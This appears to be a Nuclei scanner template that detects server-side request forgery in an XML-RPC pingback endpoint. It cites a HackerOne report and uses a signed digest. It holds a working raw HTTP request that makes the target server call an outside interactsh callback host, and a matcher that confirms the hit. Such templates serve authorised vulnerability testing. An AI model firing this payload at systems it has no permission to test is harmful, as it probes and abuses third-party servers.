id: xmlrpc-pingback-ssrf info: name: XMLRPC Pingback SSRF author: geeknik severity: high description: XMLRPC Pingback leads to SSRF. reference: - https://hackerone.com/reports/406387 metadata: max-request: 1 tags: xmlrpc,hackerone,ssrf,generic http: - raw: - | POST /xmlrpc/pingback HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 pingback.ping http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol words: - "http" # digest: 490a0046304402202fd552633b3c6f4c5532aba3b3d0025c267cf4c5704c8d692e441b7f7c5826a40220211a9632d337da7f877cf9cf0351b171370ded55566578ce211d9daee09ac6ed:922c64590222798bb761d5b6d8e72950